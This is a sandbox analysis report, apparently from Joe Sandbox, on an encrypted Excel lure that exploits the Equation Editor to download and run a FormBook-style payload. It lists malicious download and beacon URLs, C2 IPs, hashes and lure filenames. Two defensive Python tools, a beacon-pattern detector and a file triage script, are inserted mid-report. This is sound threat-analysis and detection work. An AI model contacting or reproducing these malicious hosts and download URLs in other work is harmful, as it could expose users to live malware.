09:00:17  API Interceptor  77x Sleep call for process: EQNEDT32.EXE modified
09:00:23  API Interceptor  33x Sleep call for process: vbc.exe modified
09:00:41  API Interceptor  227x Sleep call for process: wscript.exe modified
09:01:19  API Interceptor  1x Sleep call for process: explorer.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

Match           Associated Sample Name / URL  Detection  Context
160.153.138.53  ExQKDWm3fW.exe                malicious  www.paletciniz.com/ogg/?sPXp3N=eztizZ807jSs9+CT08HhjptTcxlOOjaZfVWObE9GHZ2oMY4MD52nfpfmGtATm24/doK6&Mvdl=5j2D
                Ord-51810.xls                 malicious  9dani.com/wp-keys.php
                Ord-51810.xls                 malicious  9dani.com/wp-keys.php
                ref_4264.xls                  malicious  9dani.com/wp-keys.php
                ref_4264.xls                  malicious  9dani.com/wp-keys.php
                order_45781.xls               malicious  9dani.com/wp-keys.php
                order_45781.xls               malicious  9dani.com/wp-keys.php
                Statement-56279.xls           malicious  9dani.com/wp-keys.php
                record}.41585.xls             malicious  9dani.com/wp-keys.php
                Statement-56279.xls           malicious  9dani.com/wp-keys.php
                orderord}39476.xls            malicious  9dani.com/wp-keys.php
                record}.41585.xls             malicious  9dani.com/wp-keys.php
                orderord}39476.xls            malicious  9dani.com/wp-keys.php
                Invoiceord}-55338.xls         malicious  9dani.com/wp-keys.php
                Invoiceord}-55338.xls         malicious  9dani.com/wp-keys.php
                Docord}_69254.xls             malicious  9dani.com/wp-keys.php
                order_26493.xls               malicious  9dani.com/wp-keys.php
                Docord}_69254.xls             malicious  9dani.com/wp-keys.php
                order_26493.xls               malicious  9dani.com/wp-keys.php
                Det_80851.xls                 malicious  9dani.com/wp-keys.php
104.164.99.242  2020112395387_pdf.exe         malicious  www.annaothomas.com/ogg/?JfE=L5tkrd37tHlR4/7ukC1rTm4lbmURrJu8I1/xY0HLrBdUzMMJDCBw7KJxyCSyOXKc+tPne00Ejg==&ojq0dR=SzuliJ
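The two context URLs above (the www.paletciniz.com and www.annaothomas.com beacons) share one shape: a single short directory, then exactly two query parameters with random-looking names, the first carrying a long base64-alphabet blob and the second a short token. The following is an added triage heuristic built on that observation; it is not Joe Sandbox code and not a vetted FormBook signature. The log format, the client addresses, the three benign lines, and every threshold (directory length, key length, blob length, token length) are assumptions chosen to fit the two samples on this page.

```python
"""Triage heuristic for FormBook-style HTTP beacons.

Added example for this report; not Joe Sandbox code and not a vetted
FormBook signature. It generalises from the two context URLs the report
lists (www.paletciniz.com/ogg/?... and www.annaothomas.com/ogg/?...),
which share one shape:

    /<short dir>/?<random key>=<long base64-alphabet blob>&<random key>=<short token>

Every threshold below is an assumption tuned to those two samples.
"""
import re
from typing import List, Tuple
from urllib.parse import urlsplit

# Constructed proxy log lines (not taken from the report):
#   "<timestamp> <client ip> <method> <url> <status>"
# The first two URLs are the ones in the report's context table; the
# remaining three are benign requests used as negatives.
SAMPLE_LOG = """\
2020-11-26T09:00:41Z 10.0.0.5 GET http://www.paletciniz.com/ogg/?sPXp3N=eztizZ807jSs9+CT08HhjptTcxlOOjaZfVWObE9GHZ2oMY4MD52nfpfmGtATm24/doK6&Mvdl=5j2D 200
2020-11-26T09:00:45Z 10.0.0.5 GET http://www.annaothomas.com/ogg/?JfE=L5tkrd37tHlR4/7ukC1rTm4lbmURrJu8I1/xY0HLrBdUzMMJDCBw7KJxyCSyOXKc+tPne00Ejg==&ojq0dR=SzuliJ 200
2020-11-26T09:00:50Z 10.0.0.7 GET http://cnweb.search.live.com/results.aspx?q=printer+driver 200
2020-11-26T09:00:52Z 10.0.0.7 GET http://www.google.si/search?q=vat+rate&hl=sl 200
2020-11-26T09:00:53Z 10.0.0.9 GET http://wordpress.org/ 200
"""

DIR_RE = re.compile(r"^/[a-z0-9]{2,6}/$")        # one short directory with trailing slash, e.g. /ogg/
KEY_RE = re.compile(r"^[A-Za-z0-9]{2,8}$")       # short random-looking parameter name
BLOB_RE = re.compile(r"^[A-Za-z0-9+/=]{40,}$")   # long value drawn from the base64 alphabet
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{2,8}$")     # short second value

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$"
)


def split_query(query: str) -> List[Tuple[str, str]]:
    """Split a raw query string into (key, value) pairs without decoding.

    urllib.parse.parse_qsl would turn '+' into a space and percent-decode
    the value, which would break the base64-alphabet check, so the split
    is done by hand and values are kept exactly as they appeared on the wire.
    """
    pairs = []
    for item in query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def looks_like_formbook_beacon(url: str) -> bool:
    """True when the URL has the two-parameter beacon shape described above."""
    parts = urlsplit(url)
    if not DIR_RE.match(parts.path):
        return False
    params = split_query(parts.query)
    if len(params) != 2:
        return False
    (key1, blob), (key2, token) = params
    return bool(KEY_RE.match(key1) and BLOB_RE.match(blob)
                and KEY_RE.match(key2) and TOKEN_RE.match(token))


def scan_proxy_log(text: str) -> List[Tuple[str, str]]:
    """Return (client ip, url) for every log line whose URL matches the heuristic."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and looks_like_formbook_beacon(m.group("url")):
            hits.append((m.group("client"), m.group("url")))
    return hits


if __name__ == "__main__":
    for client, url in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} -> {url}")
```

The shape check is deliberately loose, so treat a hit as a triage lead rather than a verdict: legitimate two-parameter URLs under a short directory will occasionally match, and the host should be cross-checked against the contacted IPs and domains listed in this report before acting on it.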

                                                                                                                                      Domains

Match                Associated Sample Name / URL  Detection  Context
www.annaothomas.com  2020112395387_pdf.exe         malicious  104.164.99.242

ASN

Associated Sample Name / URL | Detection | Context (rows listed under their Match)
Match: GODADDY-AMSDE
  Shipment Document BLINV And Packing List Attached.exe | malicious | 160.153.137.14
  ExQKDWm3fW.exe | malicious | 160.153.138.53
  new quotation order.exe | malicious | 160.153.136.3
  Order Catalogue Specifications.xlsx | malicious | 160.153.137.163
  Purchase Order 40,7045.exe | malicious | 160.153.136.3
  Purchase Order 40,7045$.exe | malicious | 160.153.136.3
  ORDER INQUIRY.exe | malicious | 160.153.136.3
  DEBIT NOTE DB-1130.exe | malicious | 160.153.128.7
  esm-Fichero-ES.msi | malicious | 160.153.143.165
  eLaaw7SqMi.exe | malicious | 160.153.136.3
  9Ul8m9FQ47.exe | malicious | 160.153.136.3
  dB7XQuemMc.exe | malicious | 160.153.128.3
  feJbFA6woA.exe | malicious | 160.153.136.3
  PPO040963RG02.exe | malicious | 160.153.18.187
  COMMERCIAL INVOICE BILL OF LADING DOC.exe | malicious | 160.153.136.3
  w4fNtjZBEH.exe | malicious | 160.153.129.28
  ORDER LIST.exe | malicious | 160.153.128.7
  #U306b#U4fee 2020-09-19.doc | malicious | 160.153.252.3
  2GYiwgv3lC.exe | malicious | 160.153.136.3
  H4A2-423-EM154-302.exe | malicious | 160.153.138.219
Match: EGIHOSTINGUS
  VOMAXTRADING.doc | malicious | 50.117.11.156
  inv.exe | malicious | 104.164.35.80
  2020112395387_pdf.exe | malicious | 104.164.99.242
  EME_PO.39134.xlsx | malicious | 104.164.26.233
  new quotation order.exe | malicious | 104.252.31.62
  POGWEAP.xlsx | malicious | 172.120.44.167
  oqTdpbN5rF.exe | malicious | 104.252.192.7
  Purchase Order 40,7045$.exe | malicious | 104.253.79.71
  Payment Advice - Advice Ref GLV823990339.exe | malicious | 104.164.52.200
  INQUIRY.exe | malicious | 45.39.88.85
  Invoice.exe | malicious | 45.39.153.189
  new file.exe.exe | malicious | 136.0.180.203
  hjKM0s7CWW.exe | malicious | 172.121.57.222
  9Ul8m9FQ47.exe | malicious | 107.164.194.74
  n4uladudJS.exe | malicious | 107.164.194.74
  qkN4OZWFG6.exe | malicious | 50.117.84.157
  kvdYhqN3Nh.exe | malicious | 50.117.84.157
  NzI1oP5E74.exe | malicious | 172.121.57.222
  jtFF5EQoEE.exe | malicious | 142.252.135.158
  JwekqCZAwt.exe | malicious | 172.252.49.106
Match: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
  IN 20201125 PLIN.xlsx | malicious | 103.125.191.229
  ARRIVAL NOTICE.xlsx | malicious | 103.141.138.87
  Confectionary and choco.xlsx | malicious | 103.125.191.5
  Purchase Order PRI19-338.xlsx | malicious | 103.125.191.187
  Copy of Dwg for order DLH200909ShzuSh.xlsx | malicious | 103.141.138.130
  STATEMENT NOV20.xlsx | malicious | 103.141.138.87
  IN 20201125 PLIN.xlsx | malicious | 103.125.191.229
  SCAN_ARRIVAL_DOCUMENTS.xlsx | malicious | 103.141.138.120
  PO23419852020.xlsx | malicious | 103.141.138.124
  New Order .xlsx | malicious | 103.125.191.5
  Request for quotation.xlsx | malicious | 103.141.138.87
  Tyre Pricelist.xlsx | malicious | 103.125.191.5
  2eD17GZuWs.exe | malicious | 103.125.191.5
  Unique food order.xlsx | malicious | 103.125.191.5
  tt payment proof.xlsx | malicious | 103.125.191.187
  TIE-3735-2020.xlsx | malicious | 103.125.191.229
  payslip.s.xlsx | malicious | 103.125.191.187
  Telex-relase.xlsx | malicious | 103.141.138.120
  Y0L60XAhvo.rtf | malicious | 103.141.138.122
  d6pj421rXA.exe | malicious | 103.139.45.59

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                                                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):399360
                                                                                                                                      Entropy (8bit):7.118443825865952
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:KTitbK35IMjVfUHgRGmqX16+aMWH06dUpfCnm4995z:KT8bA5IdH4GRs+aM6cpCnm
                                                                                                                                      MD5:E54D832CB872B7DC086AB7A7878D38FB
                                                                                                                                      SHA1:DD865DEAFFA4558EEBEBCB83B5335DE2B0B26327
                                                                                                                                      SHA-256:06A0E3845D7B4C5593A9143EB1AE73223760D68F2ACF0E5BE631B9EEAB3675F3
                                                                                                                                      SHA-512:04A78936551DF1BF62D4B256C2A5888AF840D9F1FB1735810B1C5145AF0795C6C84E03B66754137242691AA0FFA26CEB7295D3CDC59323B939DAA8D7CB24BAC0
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                                      IE Cache URL:http://wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu/chnsfrnd2/winlog.exe
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................(...9............./....8...=...Rich...........................PE..L....._.................*...........5.......@....@..........................P............@..................................a...............................0......................................X\..@............@...............................text....).......*.................. ..`.rdata...+...@...,..................@..@.data...`(...p.......Z..............@....rsrc................x..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................
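The record above describes winlog[1].exe, fetched by EQNEDT32.EXE, as a PE32 i386 console binary with 8-bit entropy 7.118 and gives its MD5/SHA1/SHA-256/SHA-512. The Python below is an added example, not code from Joe Sandbox or from this report, showing how a responder reproduces those triage fields offline and checks a file against the listed SHA-256: the four hashes, Shannon entropy, a parse of the DOS/NT headers for machine and subsystem, and an entropy cut-off. The 7.0 threshold and the minimal PE sample built by build_sample_pe() are assumptions constructed for the example; only REPORT_WINLOG_SHA256 comes from the report.

```python
"""Reproduce the dropped-file triage fields (hashes, 8-bit entropy, PE type) and
check a file against a known-bad SHA-256. Added example; not Joe Sandbox code."""
import hashlib
import math
import struct
from collections import Counter

# SHA-256 of winlog[1].exe as listed in the report above (the IOC to match against).
REPORT_WINLOG_SHA256 = "06A0E3845D7B4C5593A9143EB1AE73223760D68F2ACF0E5BE631B9EEAB3675F3"

# Assumed triage cut-off (not the sandbox's): entropy at or above this suggests packing/encryption.
ENTROPY_THRESHOLD = 7.0

MACHINES = {0x14C: "i386", 0x8664: "x86-64"}
SUBSYSTEMS = {2: "gui", 3: "console"}


def file_hashes(data):
    """Upper-case hex digests in the order the report lists them."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte: 0.0 for a single repeated byte, 8.0 at most."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_summary(data):
    """Parse DOS and NT headers; return machine, subsystem and PE32 flag, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # Need "PE\0\0" (4) + COFF header (20) + optional header up to and including Subsystem (70).
    if e_lfanew + 24 + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    opt = e_lfanew + 24                              # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]   # 0x10B = PE32, 0x20B = PE32+
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "pe32": magic == 0x10B,
    }


def triage(data, ioc_sha256=(REPORT_WINLOG_SHA256,), threshold=ENTROPY_THRESHOLD):
    """Build the fields the report shows for a dropped file, plus an IOC match flag."""
    hashes = file_hashes(data)
    entropy = shannon_entropy(data)
    return {
        "hashes": hashes,
        "entropy": round(entropy, 6),
        "high_entropy": entropy >= threshold,
        "pe": pe_summary(data),
        "ioc_match": hashes["sha256"] in {s.upper() for s in ioc_sha256},
    }


def build_sample_pe():
    """Constructed stand-in for a dropped binary: minimal MZ/PE32 i386 console headers, zero body."""
    buf = bytearray(0x40 + 24 + 224)                 # DOS header + signature/COFF + PE32 optional header
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)          # e_lfanew -> NT headers at 0x40
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x44, 0x14C)         # IMAGE_FILE_MACHINE_I386
    struct.pack_into("<H", buf, 0x40 + 24, 0x10B)    # PE32 optional-header magic
    struct.pack_into("<H", buf, 0x40 + 24 + 68, 3)   # IMAGE_SUBSYSTEM_WINDOWS_CUI (console)
    return bytes(buf)


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

Run triage() on the real dropped file (read with open(path, "rb")) to confirm the SHA-256 against the report before pivoting on it; the entropy figure and PE fields should then match the record above, and a high-entropy hit on a small console PE is the usual sign of a packed FormBook loader.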
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420BD973.emf
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1099960
                                                                                                                                      Entropy (8bit):2.0152883385143165
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:UXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:SahIFdyiaT2qtXw
                                                                                                                                      MD5:FE7496393B4417F687E141BAE9211775
                                                                                                                                      SHA1:507284C9227C103959A885A2F1B354E8F15FD65B
                                                                                                                                      SHA-256:EEDC1AC79E6622FC37D37A9A77C05BB93615B04A1E0A340DD6819CB3BE3183E4
                                                                                                                                      SHA-512:35954EB49D67207FF452C833FB4AB34BDDD8A8F98711F6DDA006E09846EF9AF740FB1E615FEC60A13631B455274005FBAAD08D3EA521DF7AC034739B48387A71
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................$................N.U................l....N.U........ ....y.Q........ ............z.Q............................................X...%...7...................{ .@................C.a.l.i.b.r.................X............2.Q.................{.Q............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4F78DCD8.jpeg
                                                                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                      File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):48770
                                                                                                                                      Entropy (8bit):7.801842363879827
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:false
Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C23946F9.jpeg
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:dropped
Size (bytes):48770
Entropy (8bit):7.801842363879827
Encrypted:false
SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:false
Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
C:\Users\user\Desktop\~$PI202009255687.xlsx
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
C:\Users\Public\vbc.exe
Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):399360
Entropy (8bit):7.118443825865952
Encrypted:false
SSDEEP:6144:KTitbK35IMjVfUHgRGmqX16+aMWH06dUpfCnm4995z:KT8bA5IdH4GRs+aM6cpCnm
MD5:E54D832CB872B7DC086AB7A7878D38FB
SHA1:DD865DEAFFA4558EEBEBCB83B5335DE2B0B26327
SHA-256:06A0E3845D7B4C5593A9143EB1AE73223760D68F2ACF0E5BE631B9EEAB3675F3
SHA-512:04A78936551DF1BF62D4B256C2A5888AF840D9F1FB1735810B1C5145AF0795C6C84E03B66754137242691AA0FFA26CEB7295D3CDC59323B939DAA8D7CB24BAC0
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 31%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................(...9............./....8...=...Rich...........................PE..L....._.................*...........5.......@....@..........................P............@..................................a...............................0......................................X\..@............@...............................text....).......*.................. ..`.rdata...+...@...,..................@..@.data...`(...p.......Z..............@....rsrc................x..............@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:CDFV2 Encrypted
Entropy (8bit):7.996820946995735
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:PI202009255687.xlsx
File size:2625536
MD5:d7c0c12c1cdf36e9f97f96cb3fe16ae0
SHA1:e73e8bd48f5ef68747de444e44d59745cb75b08a
SHA256:76b2d9b4655b8a349e1b5c7bf05ac5bb22bea988bc818e46756b17d7e22a37d1
SHA512:1032c3abfa95c26c00c42b5bba0ef6bfd565b9391a255f7eb36f5edee271a46fac0e1a707c23a5820a307a76c4773a8b74f0f15efa2c594d6d79e953c52d5a7b
SSDEEP:49152:AP4hSHH7IZl2QU0sAYEr36zvNe3j4qJ8rymPgojJYm493N9STtxX2LoQlByCQ:e4hoIb2Q3vugj4qCrym9tc1ufiO
File Content Preview:........................>...................)...........................................................................................~...............z.......|.......~...............z.......|.......~...............z.......|.......~......................

File Icon

Icon Hash:e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type:OLE
Number of OLE Files:1

OLE File "PI202009255687.xlsx"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:True
Contains Word Document Stream:False
Contains Workbook/Book Stream:False
Contains PowerPoint Document Stream:False
Contains Visio Document Stream:False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
General
Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:data
Stream Size:64
Entropy:2.73637206947
Base64 Encoded:False
Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
General
Stream Path:\x6DataSpaces/DataSpaceMap
File Type:data
Stream Size:112
Entropy:2.7597816111
Base64 Encoded:False
Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
General
Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:data
Stream Size:200
Entropy:3.13335930328
Base64 Encoded:False
Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
General
Stream Path:\x6DataSpaces/Version
File Type:data
Stream Size:76
Entropy:2.79079600998
Base64 Encoded:False
Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
Stream Path: EncryptedPackage, File Type: COM executable for DOS, Stream Size: 2600648
General
Stream Path:EncryptedPackage
File Type:COM executable for DOS
Stream Size:2600648
Entropy:7.99992874048
Base64 Encoded:True
Data ASCII:. . ' . . . . . . . ; . . . . [ + . . . . . . . j . % H . s . . . . . k . . S . - . . q . c x r . . ) . . Q . . . \\ S j . . . g @ . . . f . . ? c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . . o 9 B . . 1 . . c < 2 . . . . .
Data Raw:b8 ae 27 00 00 00 00 00 06 85 3b c0 af 0d 83 5b 2b bc 06 da c3 a0 1e f9 6a c0 25 48 0f 73 dc cc dc f2 95 6b fb fb 53 c6 2d 87 eb 71 95 63 78 72 fb 0e 29 e4 15 51 a0 86 08 5c 53 6a 9f 90 fc 67 40 0c b9 8f 66 f1 94 3f 63 3c 32 d7 d3 8e 97 99 6f 39 42 f7 a3 31 c7 92 63 3c 32 d7 d3 8e 97 99 6f 39 42 f7 a3 31 c7 92 63 3c 32 d7 d3 8e 97 99 6f 39 42 f7 a3 31 c7 92 63 3c 32 d7 d3 8e 97 99
Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
General
Stream Path:EncryptionInfo
File Type:data
Stream Size:224
Entropy:4.51425494201
Base64 Encoded:False
Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . M . o . $ . ' . & . . . A g . . . . . / . u . . . . 2 . . . . . . $ p . t k . . . . . ( . . P . . . . . . . u . T . + F . . .
